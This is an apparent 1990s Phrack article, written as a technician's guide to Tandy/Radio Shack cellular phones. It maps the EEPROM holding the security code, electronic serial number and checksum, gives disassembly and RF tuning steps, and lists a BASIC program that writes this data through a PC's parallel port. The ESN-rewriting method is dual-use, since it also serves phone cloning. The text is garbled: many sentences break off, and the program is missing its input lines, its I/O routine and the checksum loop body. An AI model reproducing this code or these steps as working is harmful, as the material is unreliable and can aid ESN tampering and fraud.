programmable read-only memory (EEPROM) device as the numeric
assignment module (NAM) information, corruption of the data can
be catastrophic to the operation of the phone.

Since the handset programming mode of these Nokia units actually
write-enables the memory device to store the alterable parameters,
an errant pulse from the microprocessor, dropped bits or supply
voltages falling out of tolerance can cause the ESN or checksum
to become overwritten or otherwise rendered useless.  Should this
occur, dealers have had little recourse but to ship the
transceiver back to the factory for repair.  Until now, that is.

The goal of Phoenix Rising Communications in producing this
documentation is to empower technicians to do the job they have
been educated and hired to perform.  This guide to Tandy and
Radio Shack cellular phones will enable the technician to rebuild the
corrupt data within this series of transceivers with confidence.

The information in this article was developed from the installed
and transportable versions of the most commonly purchased phones
from Radio Shack stores.  These units were sold for many years,
and finally replaced last year with a new, redesigned model.  The
data presented here can probably be applied to certain compatible
Nokia transceivers as indicated later in the text. 

                                 CHAPTER 1

This publication is designed to provide supplemental information
to assist in the servicing of cellular mobile telephones
manufactured by Tandy Corporation under license from the Nokia Corporation. 
It is not meant to be a replacement for the factory service manual. 
Any shop needing to perform component level repairs should
definitely obtain the factory documentation from Tandy National

Our primary goal is to explain the contents of the numeric
assignment module, or NAM.  In these particular phones, both the
NAM parameters and the electronic serial number (ESN) are stored
within the same electrically erasable programmable read-only
memory (EEPROM) device.

The problem inherent with this engineering decision is that the
ESN stored within this chip is not necessarily permanent.  Since the
chip can be erased or reprogrammed, certain circumstances could
possibly cause the ESN to become corrupt.  These include improper
signals from the microprocessor, induced currents or a power
interruption during NAM programming as the write cycle is taking

Since the available service literature does not describe the
functions of this serial EEPROM or the data contained within,
service personnel would have to return the transceiver to the
manufacturer for service.  This is not cost effective in terms of
time or money for either the shop or cellular customer.

Technicians who invest a little time to become familiar with the
data stored within the NAM circuitry, including the placement of
the ESN and checksum byte can service these types of problems
in-house and with little difficulty.

Basic instructions for peaking the transceiver's RF sections have
also been included herein as a convenience.  While the phone is
open and on the test bench, the customer's transceiver should
also be given a quick check for proper alignment.

                            EQUIPMENT REQUIRED

Other than basic hand tools, disassembly of the phone requires a
soldering iron with a medium sized tip and a vacuum de-soldering
tool.  Good size solder removal braid may be used in conjunction
with, or in lieu of the de-soldering tool.

To correct data that has become corrupted within the EEPROM, a
programming device is required capable of reading and burning an
8-pin DIP integrated circuit.  One such inexpensive device is
listed in appendix III.

An individual who is familiar with the memory device involved has
written a software program in the BASIC language to allow the
programming of this chip via the parallel port of an
IBM-compatible personal computer.  The source code for this program
can be found in the appendix, and is provided as a reference only.  Such
software is subject to the peculiarities of the host PC and
therefore cannot be recommended for use in place of a standard PROM
programmer.  Older versions of GWBASIC are preferred to Microsoft's
current QBASIC interpreter.

                              MODELS COVERED

The information presented is believed to cover all of the installed
and transportable (bag phone) cellular transceivers manufactured
by the Tandy Corporation under license from the Nokia Corporation up
until about a year ago.
Tests have been conducted on a random selection of these phones
with manufacture dates ranging from 1989 through early 1994.  All
versions of the "TP" firmware through January, 1994 should be

Although no house-branded OEM Nokia transceivers have been
tested, we have surmised that this information is applicable to several
models based on the same or a similar design.  These models
include the Nokia LX-11, M-11, M-10 and the Nokia-Mobira P4000 (PT612). 
Some of these units, like the very old Radio Shack equivalents,
will require a service handset to program.  More on that in the
next issue of Phrack.

                              HAND-HELD UNITS

Only one of the hand-held cellular phones previously sold through
Radio Shack utilizes a discrete surface-mounted integrated
circuit to store the ESN and NAM parameters.  If you have the capability
to read and program this SOIC 93C46 memory device you may be able to
extrapolate the PROM dumps in this guide to work with this phone.

Due to the difficulty in disassembling this unit and the delicate
nature of the surface-mounted EEPROM, the reader is cautioned
against attempting to service these in-house.


Prior to disassembling the transceiver, all antenna and cables,
including the handset, should be disconnected from the jacks on
the unit.

To aid in disassembly and component location, the original
hard-copy version of this publication contained several pages of
photographs.  While the hard-copy version is available (see end of
article), you will hopefully be able to figure out what we're talking about
without them.

Disassembly begins by snapping the plastic end panel from the
black transceiver cover.  Some units just pop up and off, while others
have two small plastic tabs on each side that must be depressed
free the end panel for removal.

With the end panel removed, the top plastic cover is now free to
slide off.  With this cover removed, the metal transceiver itself
can be dumped from the remaining plastic housing by turning it
upside down, or pulling up on the metal heat sink assembly that
comprises one side of the transceiver unit.

There is a metal shield on each side of the transceiver (top and
bottom.)  One is a solid piece of thin sheet metal, and the other
is broken up in to smaller, individual shields and soldered to
the transceiver chassis.  The shield that needs to be removed is the
solid one.  It is only held in place with the friction grips
along the edges, and can be pried off with your fingers.

Once the shield is removed from the proper side of the
transceiver, the solder side of the logic board will be exposed.
This board must be removed to gain access to the component side.  Take
static precautions so as not to fry the CMOS silicon that is currently
hidden from view. 

Other than several connectors that mate between the two boards,
the board is usually held in place by several blobs of solder spaced
along the edge of the board.  These small 'solder welds' serve as
a ground bond between the board and the transceiver chassis, and
are not electrically necessary under normal circumstances.

Once the solder ground bonds have been melted and removed with a
de-soldering tool or solder wick, use a pair of needle-nose pliers
to gently bend back the small metal tabs holding the circuit
board in place.

Before proceeding, inspect the foil side of the board to ensure
that no solder has splashed on the board during de-soldering, and
that the foil traces where the work was performed are still
intact.  This last step is where most trouble arises.  These boards are
delicate, and a heavy hand while prying or bending will almost
ensure that a trace or five will be transected when the tool
slips.  If this happens, resolder the traces to undo the damage.

At this point the logic board is held in place only by pins on
the transceiver board sticking up in to sockets on the logic board. 
Gripping the edges of the logic board with your fingers and
pulling straight up will disengage the connectors and allow the logic
board to pull free of the transceiver.  Slightly rocking the board from
each side may aid in the removal.  Do not grip the board with
pliers or damage can result to the small chip resistors and other
components mounted on the solder side of the board.

Once dislodged, you'll have two separate circuit boards.   

                              THE LOGIC BOARD

The board that supplies logic and control functions for the
cellular mobile telephone is easily identifiable by the
microprocessor and 27C512 EPROM containing the operating
firmware.  The EPROM's erase window is covered by a protective sticker
that identifies the firmware version stored therein.  Within the last
few years, the version has ranged from TP-2 through TP-8.

Also on this board is the serial EEPROM where the ESN and NAM
parameters are stored.  This chip is an 8-pin DIP located in a
socket near pin #1 of the NEC microprocessor.  It is usually
covered with a small paper sticker bearing the last few digits of
the serial number stored inside.

While security experts may blast Nokia for designing a phone that
stores the ESN in a socketed chip, and then says "here I am" by
placing a sticker on it, this is a dream come true for any
technician facing issues of data corruption.  

                             THE SERIAL EEPROM

The Serial EEPROM containing all of this data is a PCD8572 (or
85C72) manufactured by Microchip Technology, Inc.

This 8-pin device is a 1k (128x8) CMOS serial electrically
erasable PROM.  The pin configuration for the device can be found in the

Power is supplied to this chip only when the microprocessor is
performing a read or write operation.  Transistor Q115 (surface
mounted to the underside of the logic board right about in the
middle) switches the supply voltage on and off.  Should power be
interrupted during the write cycle, the ESN may become corrupt.

                            REBUILDING THE ESN

To replace the damaged serial number, note the unit's serial
number from the cellular service agreement or the phone itself.
The ESN (in decimal) is located on a white paper sticker applied to the
side of the metal transceiver chassis.  It is also stamped into the
plastic model identification plate on one side of the plastic
outer housing.

For reprogramming, the ESN must be converted to hex.  A scientific
calculator or any number of public domain computer programs will
simplify the task.

                          CONTENTS OF NAM

Once the original serial number has been determined, carefully
remove the 8572 EEPROM from the socket and place it in the
adapter required by your PROM programmer.  Reading the contents of the
chip, you'll see data as depicted below.

Note that these data dumps are simulated for illustrative purposes.
The ESN and encoded MIN bytes are not legitimate numbers, so don't
bother 'testing' them.

The first five bytes of data contain the security code.  These
bytes are the hex values representing ASCII characters 0 through
9, thus represented as "3X" where "X" is the actual digit of the
security code.  A factory security code of 1 2 3 4 5 would be
represented in bytes 00 through 04 as follows:

31 32 33 34 35

Since you will require the security code to enter handset
programming mode, please note the current security code or
program these bytes with your shop's standard default.
                     UNDERSTANDING ADDRESSES

Some cellular technicians have little experience in the digital
world.  Service monitors and watt-meters are expensive and wonderful
devices, but sometimes you need to do a little more than tweak a pot
to fix a phone.  The digital-literate can skip this oversimplified

To assist those in reading the locations of the various bytes in the EEPROM,
understand that each line (as usually displayed on a programmer) contains
sixteen (16) bytes.  The first line begins with byte 00, then 01, 02, 03,
04, 05, 06, 07, 08, 09, 0A, 0B, 0C, 0D, 0E and finally 0F.

The second line begins with 10, then 11, 12, 13, 14, 15, 16, 17,
18, 19, 1A, 1B, 1C, 1D, 1E, and 1F as the last byte of the line. 
The third line increments the same way, except as byte 30, 31,
etc., to 3F.  You now know how to count in base 16 (hex)! 

As an example, the locations used by the phone end at byte 3D,
which contains 00 in the example below.  Beginning with the next
byte (3E), a repetitive pattern of alternating values of AA and
55 are stored.  This is just 'test' data and is never read by the
phone.  The chip itself ends at byte 7F, and your PROM programmer
may display FF following byte 7F to indicate the non-existence of
these locations in the chip.

                     8572 EXAMPLE DATA DUMP

          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF 00 AA 55
          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 

                    THE CRUCIAL SERIAL NUMBER

The hex ESN for any given phone consists of four bytes, as we use
the term here.  Technically it is eight bytes (in hex, 32 bits if
expressed in binary form), but we're referring to a 'byte' as a two-digit
hex number, rather than each digit (byte) as a single entity.  For our
example, we're using the fictitious ESN of A521FF0A.  All Radio Shack
phones will have an ESN beginning with A5 hex.  This is the "manufacturers
code" prefix that has been assigned to Tandy.

Breaking the ESN into four bytes as viewed on the PROM programmer,
the ESN would appear as:

                          A5 21 FF 0A

Refer back to the example dump of the data within the 8572 IC. 
Immediately following the security code is the ESN stored in
reverse order.  With the security code occupying bytes 00 to 04,
the ESN is located in bytes 05, 06, 07 and 08.  Byte 09 contains
the value 38.  It should always contain 38.

In the example, beginning with byte 05 you can read the ESN (in
reverse sequence) as:

                         0A FF 21 A5

The examples below will assist you in visualizing the bytes
containing the security code and the electronic serial number. 
The programming and placement of these two crucial pieces of data is
fairly straight forward.  Using the buffer editor function of the
PROM programmer, you can simply type over the garbage that may be
present in these locations with the correct values for the
security code and the ESN.  Double check your data entry!

                      OTHER ADDRESSES

The entire NAM data is stored in the remaining locations of this
chip.  Bytes 0A, 0B and 0C contain the firmware revision date,
and bytes 0D - 0F contain the installation date as programmed via the
handset programming mode.

Other bytes contain the encoded Mobile Identification Number
(MIN), Station Class Mark (SCM), etc.

These various bytes do not need to be reprogrammed through your
PROM burner, as they can all be corrected via handset
programming.  Only the security code and ESN must be properly reprogrammed
directly to the chip itself.  For more information on the locations
of this other data, refer to the source code in Appendix A.  It
allows you to see where (and how) this other data is stored within
the NAM.

The last item to program is the checksum.


          0000 31 32 33 34 35 XX XX XX XX XX XX XX XX XX XX XX

THE ESN:  BYTES 05 - 08

          0000 XX XX XX XX XX 0A FF 21 A5 XX XX XX XX XX XX XX

                    LOCATING THE CHECKSUM

There is a one byte device checksum stored within the 8572 that
is used by the phone to check the integrity of the data stored
therein.  The checksum is located at byte 3D, indicated by "XX"
in the example below.

The checksum is derived from all the data stored in the NAM, not
just the ESN.  Computing it is relatively easy as it is simply
the sum (in hex) of all the values from bytes 00 through 3C as
underlined below.

Assuming the PROM programmer has a checksum function, you can
enter the beginning address as 0000 and the ending address as 003C. 
The software will add all of the values between these locations and
give you the sum.  The alternative is to add the numbers manually
using the hex mode of a scientific calculator.  Either way, adding
the hex values of all the bytes between 00 and 3C of our example yields
a sum of 0B5E.

The least significant two-digit byte is the actual device
checksum that would be programmed in location 3D.  In our example, the
least significant half is 5E.  Ignoring the most significant half of
the sum (0B), a value of 5E must be programmed to location 3D.

Note that the checksum will be recomputed and change after
handset programming.  When the MIN or other data is changed, it alters
the values in various bytes.  The checksum encompasses all of the
data stored within the chip used by the transceiver's firmware.

                          CHECKSUM LOCATION

          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 


          0000 31 32 33 34 35 0A FF 21 A5 38 25 82 0F 25 17 1A
          0010 00 00 00 00 24 15 B1 C3 24 04 A3 21 16 2D 11 AA
          0020 0A 00 00 64 6C B3 32 00 27 00 01 01 11 11 11 11
          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF .. .. ..
          0040 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
          0050 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
          0060 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
          0070 .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. 

                            DEFAULT VALUES

In the event that all of the data stored within the NAM becomes
corrupt, the technician will need to program the security code,
the ESN, and certain default data values to allow the phone to power
up.  Once powered up, all of the other data can be automatically
reconstructed by the phone using the handset programming mode.

Since the factory does not provide any information about the
contents of the 8572 EEPROM, we are unsure of the function of
this 'default data.'  It seems to have little significance.

The underlined bytes depicted below are fairly typical.  Ideally
the technician should compare the contents of an operational
phone with equivalent firmware to determine the values for the
underlined locations, but if this is not possible then the values
provided in the example may suffice.

Once these defaults have been programmed in the proper locations,
and the ESN and security code have been reconstructed, compute
the checksum and store it in address 3D. Temporarily reassemble the
phone and apply power.  The unit should power up and complete it's
self-test which will include the operation where the microprocessor
computes the NAM checksum and compares it to the value stored in
location 3D.

Assuming the self-diagnostics pass, the remaining data can now be
reconstructed through normal handset programming.

The handset programming template applicable to most of these
units is located immediately following the appendix detailing the chip
programming software included for reference purposes.  

                        DEFAULT DATA VALUES

          0000 XX XX XX XX XX XX XX XX XX 38 XX XX XX XX XX XX
          0010 00 00 00 00 XX XX XX XX XX XX XX XX XX XX XX XX
          0020 XX XX XX XX XX XX XX 00 27 00 01 01 11 11 11 11
          0030 11 08 4D 01 0F 01 0F 00 04 00 00 00 FF XX AA 55
          0040 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0050 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0060 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55
          0070 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 AA 55 

                         ADDITIONAL NOTES

As discussed, the parallel port programming software interface
has a few quirks, most involving the programming voltage supplied to
the chip.  If all else fails, and a PROM burner is not available,
take the supply voltage (Vcc) directly from the logic board.

Run test lead jumpers from pins #4 and #8 of the IC socket on the
logic board that held the 8572 EEPROM and connect to the
respective pins on the socket attached to the cable to be used for
programming.  Turn the board over and locate surface mount
transistor Q115 which switches the supply voltage to the IC
socket on and off.

This small chip transistor is directly to the left of pin #8 (of
the 8572 socket) and can be positively identified by the circuit
trace from socket pin #8 leading directly to the emitter of Q115.

By examining this area of the board, you can determine which of
the other two traces connects to the transistor's collector. 
Jumpering the traces and shorting the collector and emitter simply
provides a constant, conditioned voltage supply to the socket designed to
power the 8572 in programming mode.  It may also be necessary to cut the
trace to the base of Q115.

Once the chip has been programmed with the software, restore the
integrity of the cut trace to the base of Q115 and remove the
short between the collector and emitter.

                         USING THE SOFTWARE

The Cellular Data Repair Utility software requires that you first
create a small text file using an ASCII text editor such as DOS's
"EDIT" utility program.

This text file must contain the data described below in the
specific order presented.  The data in this image (.img) file
will be programmed into the 8572.

XXX       ESN Prefix (decimal)
XXXXXXXX  ESN (8 digits decimal)
XXXXX     SIDH (5 digits decimal)
1         Access Bit
1         Local Option Bit
AAAPPPXXXX       MIN (10 digits)
08        SCM
0XXX      (0333 or 0334)
10        Access Overload Class
1         Pref. System Bit
10        GIM
12345     Security Code

Filename:  TEST.IMG



Once the image file containing the appropriate data has been
saved, run the software with QBASIC or Microsoft BASIC and follow the
prompts.  Be sure to set the proper parallel port address in line
1950 to reflect the port to which the interface is connected

                             TUNING STEPS

1)   With a digital voltmeter attached to the positive terminal
of C908, adjust VR908 to provide a reading of 8 vdc (q 0.1 volt).

2)   With the voltmeter attached to the positive terminal of
C913, adjust VR918 for a reading of 8 vdc (q 0.1 volt).

3)   Connect the voltmeter to test point TXV and enter diagnostic
command 0, 1, SEL, 9, END.  Adjust C676 to achieve a reading of 5
vdc control voltage (q 0.1 volt).

4)   Check receiver control voltage with test point RXV.  Adjust
C614 for a reading of 4 vdc (q 0.1 volt).

5)   With  a power meter connected to the antenna connector of
the transceiver through an attenuator, enter command SEL, 1, 2, SND,
END to turn on the transmitter at high power.  VR814 should then
be adjusted to show 3 watts (34.8 dBm) on the power meter.

6)   Using the same power meter, enter command SEL, 1, 3, 7, END.

Adjust VR846 for a low power maximum reading of 4 milliwatts (6

7)   Using a frequency counter to measure the output of the
antenna connector, adjust X600 for a reading of 836.4000 MHz (q 0.1 kHz).

8)   Using a deviation meter, activate DTMF tones with command
SEL, 2, 1, END, 1, 1, END and adjust VR259 for 8.4 kHz q 0.1 kHz DTMF

9)   End DTMF signaling with command 1, 0, END.  Enable SAT
transmission by entering SEL, 2, 8, SND, END and adjust VR261 for
7.8 kHz deviation (q 0.1 kHz).

10)  Enter SND, END to discontinue SAT signaling.

                        ADDITIONAL ADJUSTMENT

The level of audio fed to the earphone via the "ear" line (pin #7
on the handset connector) can be adjusted via VR215.  1.2 Vrms is
the factory specified level with the volume turned up to it's
maximum setting.

Received audio signals can be adjusted for minimal distortion by
peaking L703.

Frequency deviation of voice audio can be fine tuned with VR260. 
Factory spec. is for 8 kHz deviation.


If the transceiver refuses to even power up and begin self-diagnostics,
check the traces on the underside of the board near the power connector.

Most of these units 'protect' themselves against reverse polarity
being present on the power cables with fusible traces.  If the
phone is connected to a vehicle or battery power supply backwards,
one of these very small circuit traces will vaporize, leaving the
phone inoperative.

While inconvenient for the customer and service technician alike,
repairing the trace is an additional source of revenue for the
shop that might not be generated had a standard replaceable fuse or
rectifier been utilized in the design.

                             APPENDIX III

                         TECHNICAL RESOURCES


In preparing this article and performing other research involving various
types of firmware, we used the EPROM+ programming system from Andromeda
Research.  This small, portable device is housed in a carrying case and
requires no internal card to operate with your PC.  Once the software is
installed on the computer, the EPROM+ programmer is simply plugged into an
available parallel printer port.

To program the PCD8572 series EEPROMs, a small adapter is required.

You can construct this yourself from the included instructions,
or purchase it already built for about $35 extra.

The EPROM+ programming system is available for $289 from the

     Andromeda Research
     P.O. Box 222
     Milford, Ohio 45150
     (513) 831-9708 - voice
     (513) 831-7562 - fax


Service manuals are available for most Radio Shack or Tandy products from
Tandy National Parts.  Ordering these publications requires that you visit
your local Radio Shack store.  Tell the clerk that you want him (or her)
to call National Parts and order a service manual for catalog number....

National Parts no longer accepts calls from consumers and will only
ship to a recognized Radio Shack retail outlet.


Service handsets, manuals and other parts can be ordered from
Nokia-Mobira in Largo, Florida.  Their toll-free technical
assistance number is (800) 666-5553.


Tandy Support Services offers technical information via fax-back
server.  There is no mention that the service is restricted to
Radio Shack stores.  Although ANI can be hell, the toll-free number
is (800) 323-6586 if you want to be faxed product info on assorted 'Shack
products.  The server makes neat video game noises, and thanks you for
using the service.

For an index of the cellular specification sheets available via
fax-back, request document #8882.

Programming instructions are also available from this automated
fax server:


9009           Current List [index] 
8728           CT-105, 1050, 1055
9004           CT-350
9005           CT-302
9006           CT-102, 103, 104, 1030, 1033
9007           CT-300, 301
9008           CT-100, 101, 200, 201
9020           CT-351
9665           BC901ST         [170-1015]
9579           CP-1700         [170-1016]
9577           CP-4600/5600    [170-1067 / 170-1056]
14493          Ericsson AH-210 [170-1064]
9581           EZ-400          [170-1057]
9743           Motorola 12822  [170-1058]
9583           Motorola DPC550 [170-1059]

This information provided for reference purposes only.  Use of
this fax-back service may be restricted to authorized personnel.  No
one has ever faxed me to complain, however. 

                       THE INTERFACE

The uuencoded drawing which accompanies this article describes the
interface required to use the programming software to rebuild the data
stored within the serial EEPROM.  Because there are a number of variables
that can affect the performance of this software and interface, prepare
yourself for a bit of trial and error.  A standard programming device is
recommended over the use of this software.  Since the original publication
of this manual in hard-copy, we've heard reports that the software does not
work well with the PCD8572, but does favor the PCD85C72 (CMOS version).

The DB-25 connector is wired to an 8-pin DIP socket to accommodate the 8572
integrated circuit.  A regulated, well-filtered source of 5 volts must be
connected to pin #8 of the DIP socket, and Pin #4 must be tied to ground.
If the PC used for programming and the power source to the IC socket share
a common ground, you may be able to use pin #25 of the parallel port connector
as shown in the diagram.
Please be careful not to cause any shorts in this instance or you
may damage your computer by sinking too much current through the
parallel port.  If you are unsure of what you are doing, eliminate
the connection between pin #4 of the IC socket and pin #25 of the
DB-25 connector.  Instead, connect pin #4 directly to ground.

The resistor shown in the circuit is used as an optional voltage
divider.  Depending on the voltage provided by pin #2 of your
parallel port, a resistor between 100 and 1k ohms may be required
to drop it to a level within the nominal range required by the

                       TUNING THE RADIO

The diagrams in the uuencoded .zip file will assist in identifying and
locating the various adjustment points on the logic board and transceiver (RF)
PC board.  Alignment should not be attempted by technicians unfamiliar with
the principles involved, or in the absence of calibrated radio frequency
measurement equipment.

A diagnostic (service) handset may be required to access
service-level commands within the transceiver.  If the phone does
not respond properly to the commands documented herein, you'll
need to obtain a service handset from Tandy National Parts.  This
handset is actually a Nokia "programming handset" which can be
obtained directly from the factory.

                       PROGRAMMING TEMPLATE

          For Tandy / Radio Shack Cellular Mobile Telephones
                 Models CT-102, 302, 1030, 1033, etc.

1)   Power up phone.  After the phone cycles through it's
self-test mode and the display clears, enter the following keystrokes from
the keypad:

     *, 3, 0, 0, 1, #, X, X, X, X, X, SEL, 9, END

The X, X, X, X, X represents the five-digit security code stored
in EEPROM.  The factory default is 1, 2, 3, 4, 5.  This security
code is required to access handset programming mode.

2)   The display will now read:    IdEnt IF InFO Pri

3)   Press END to program NAM 1.  Display will show first
programming step.

4)   To program NAM 2, press SND twice instead of END.  Display
will cycle through:       OPt InFO diSAbLEd  then OPt InFO EnAbLEd
5)   Use the END key to step through each step.  The SND key
toggles the state of single-digit options.  To enter new
information, use END to step through the display until the old
data is displayed.  Key in the new data and press END to increment to
the next step.

6)   When programming has been completed, press SEL, CLR to save

Step #    Desired Input  Display   Data Description

01        5 digits       HO-Id     SIDH (Home System Identification)
02        0 or 1         MIN Mark  MIN Mark (Toggle with SND)
03        0 or 1         LOCL OPt  Local Use Mark (Toggle with SND)
04        10 digits      Phon      MIN (Area Code + Mobile Number)
05        08             St CLASS  SCM (Station Class Mark)
06        333 or 334     PAging Ch IPCH (Initial Paging Channel)
07        2 digits       O-LOAd CL Access Overload Class
08        A or B         PrEF SyS  Preferred System (Toggle with SND)
09        2 digits       grOUP Id  GIM Mark (Set to 10 in U.S.)
10        5 digits       SECUrity  Security Code
11        -------        1 dAtE    Firmware Date - not changeable
12        mmddyy         2 dAtE    Installation Date

Press SEL, CLR to save & exit.  Turn Power off and back on for
model CT-302.

[Begin Editorial]


"The Complete Guide to Tandy / Radio Shack Cellular Hardware" is available
for $15 prepaid.  We keep $5 of the price to cover the cost of printing
and the Priority mail postage.  The remaining $10 of the purchase price will
be donated to Boston's The L0pht to help them cover the cost of upgrading
their Internet connection for

The guys at the L0pht have always been cool with us, and maintain what
amounts to one of the best cellular archives accessible on the 'net.  We
want to do what we can to assist them in providing this public source of
enlightenment.  Now you can help them, and get something for it in return.
If nothing else, you can sit back and enjoy all my great close-up photos
of the chips <g>!

                                            -- Damien Thorn

Here's the address:

Phoenix Rising Communications
3422 W. Hammer Lane, Suite C-110
Stockton, California 95219

[end editorial]

You can reach me via e-mail at:

1005 ' Form image and program PCD8572 IC via LPT port.
1010 ' (c) 1993, 1994, 1995 WarpCoreBreachGroup - All rights reserved.
1015 ' 
1020 ' This program is not shareware/freeware.
1025 '
1030 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 00-07
1040 DATA xx,38,xx,xx,xx,xx,xx,xx ' Bytes 08-15
1050 DATA 00,00,00,00,xx,xx,xx,xx ' Bytes 16-23
1060 DATA xx,xx,xx,xx,xx,xx,xx,xx ' Bytes 24-31
1070 DATA xx,xx,xx,D6,C5,5C,C6,00 ' Bytes 32-39
1080 DATA 27,00,01,01,11,11,11,11 ' Bytes 40-47
1090 DATA 11,08,4D,01,0F,01,0F,00 ' Bytes 48-55
1100 DATA 04,00,00,00,FF          ' Bytes 56-60
1105 UNIT1$="050490"
1110 DIM BYTE$(60),BYTE(61)
1130 FILES "*.IMG"
1140 LINE INPUT "Which file do you want to read? ";F$
1150 OPEN "I",#1,F$+".IMG"
1170 INPUT#1,ESN#
1270 INPUT#1,SEC$
1280 ' Building binary image
1290 UNIT2$=MID$(UNIT$,1,2)+MID$(UNIT$,4,2)+MID$(UNIT$,9,2)
1300 CLOSE #1
1310 FOR I=1 TO 5:BYTE$(I-1)="3"+MID$(SEC$,I,1):NEXT
1320 FOR I=0 TO 2:BYTE$(10+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT1$,I*2+1,2))),2)
1325 NEXT
1330 FOR I=0 TO 2:BYTE$(13+I)=RIGHT$("0"+HEX$(VAL(MID$(UNIT2$,I*2+1,2))),2)
1335 NEXT
1340 FOR I=0 TO 4:BYTE$(24+I)=MID$(PHONE$,2*I+1,2):NEXT
1350 FOR I=5 TO 0 STEP -1
1360 Q=INT(ESN#/(16^I))
1370 ESN#=ESN#-Q*(16^I)
1380 IF Q>9 THEN Q=Q+7
1390 ESN$=ESN$+CHR$(48+Q)
1400 NEXT
1410 BYTE$(8)=RIGHT$("0"+HEX$(ESNPREFIX),2)
1420 BYTE$(5)=MID$(ESN$,5,2)
1430 BYTE$(6)=MID$(ESN$,3,2)
1440 BYTE$(7)=MID$(ESN$,1,2)
1450 FOR I=0 TO 60:Q$=BYTE$(I)
1460 QH=ASC(LEFT$(Q$,1))-48:IF QH>9 THEN QH=QH-7:IF QH>15 THEN QH=QH-32
1470 QL=ASC(RIGHT$(Q$,1))-48:IF QL>9 THEN QL=QL-7:IF QL>15 THEN QL=QL-32
1480 Q=QH*16+QL
1500 NEXT
1510 BYTE(20)=HOMEID AND 255:BYTE(21)=INT(HOMEID/256)
1520 BYTE(22)=ACCESS
1550 BYTE(30)=PGCH AND 255:BYTE(31)=INT(PGCH/256)
1590 AC$=MID$(PHONE$,1,3)
1600 PRE$=MID$(PHONE$,4,3)
1610 PH$=MID$(PHONE$,7,4)
1620 AC=VAL(AC$)
1630 IF MID$(AC$,2,2)="00" THEN AC2=AC-1:GOTO 1670
1640 IF MID$(AC$,3,1)="0" THEN AC2=AC-101:GOTO 1670
1650 IF MID$(AC$,2,1)="0" THEN AC2=AC-11:GOTO 1670
1660 AC2=AC-111
1670 PRE=VAL(PRE$)
1680 IF MID$(PRE$,2,2)="00" THEN PRE2=PRE-1:GOTO 1720
1690 IF MID$(PRE$,2,1)="0" THEN PRE2=PRE-11:GOTO 1720
1700 IF MID$(PRE$,3,1)="0" THEN PRE2=PRE-101:GOTO 1720
1710 PRE2=PRE-111
1720 IF PRE2<0 THEN PRE2=1000+PRE2
1730 IF LEFT$(PH$,1)="0" THEN D=-24:GOTO 1750
1740 D=87-24*(ASC(PH$)-49)
1750 IF MID$(PH$,4,1)="0" THEN D=D-10
1760 IF MID$(PH$,3,1)="0" THEN D=D-100
1770 IF MID$(PH$,2,1)="0" THEN D=D-1000
1780 IF MID$(PH$,1,1)="0" THEN D=D-10105
1790 PH2=VAL(PH$)-D
1800 C=INT(PRE2/4)
1810 B=64*(PRE2 AND 3)
1820 A=PH2 AND 255
1830 B=B OR INT(PH2/256)
1840 BYTE(35)=A
1850 BYTE(36)=B
1860 BYTE(37)=C
1870 BYTE(38)=AC2 AND 255
1880 BYTE(39)=INT(AC2/256)
1890 CHECK=0
1900 FOR I=0 TO 60
1920 NEXT
1930 BYTE(61)=CHECK AND 255
1940 DEV$="1010":ADDR$="000"
1945 ' Select the base address for your printer port with the next line.
1950 BASE=&H378 ' Which is LPT2. &h378 is LPT1 and &h3bc is LPT3.
1960 GOTO 2120
2010 FOR I=1 TO LEN(B$)
2020 B=ASC(MID$(B$,I,1))-48
2030 DOUT=B:CLK=0:GOSUB 1970
2040 DOUT=B:CLK=1:GOSUB 1970
2050 DOUT=B:CLK=0:GOSUB 1970
2060 NEXT
2070 T=0
2080 DOUT=1:CLK=1:GOSUB 1970
2100 IF T=200 THEN BEEP:PRINT "Nack timeout error":STOP
2105 ' Is voltage applied to the chip?
2110 T=T+1:GOTO 2080
2120 MAX=61:RELAY=1:DOUT=1:CLK=1:GOSUB 1970
2130 T$=TIME$
2140 IF T$=TIME$ GOTO 2140
2150 FOR J=0 TO MAX
2160 DOUT=1:CLK=1:GOSUB 1970 ' Start bit
2170 IF DIN=0 THEN BEEP:PRINT "Bus not free error":STOP ' Bad!
2180 DOUT=0:CLK=1:GOSUB 1970
2190 DOUT=0:CLK=0:GOSUB 1970
2200 B$=DEV$+ADDR$+"0"
2210 GOSUB 2010
2220 B$=""
2230 FOR I=7 TO 0 STEP -1
2240 IF (J AND (2^I)) THEN B$=B$+"1" ELSE B$=B$+"0"
2250 NEXT
2260 GOSUB 2010
2270 Z=BYTE(J)
2280 B$="":FOR I=7 TO 0 STEP -1
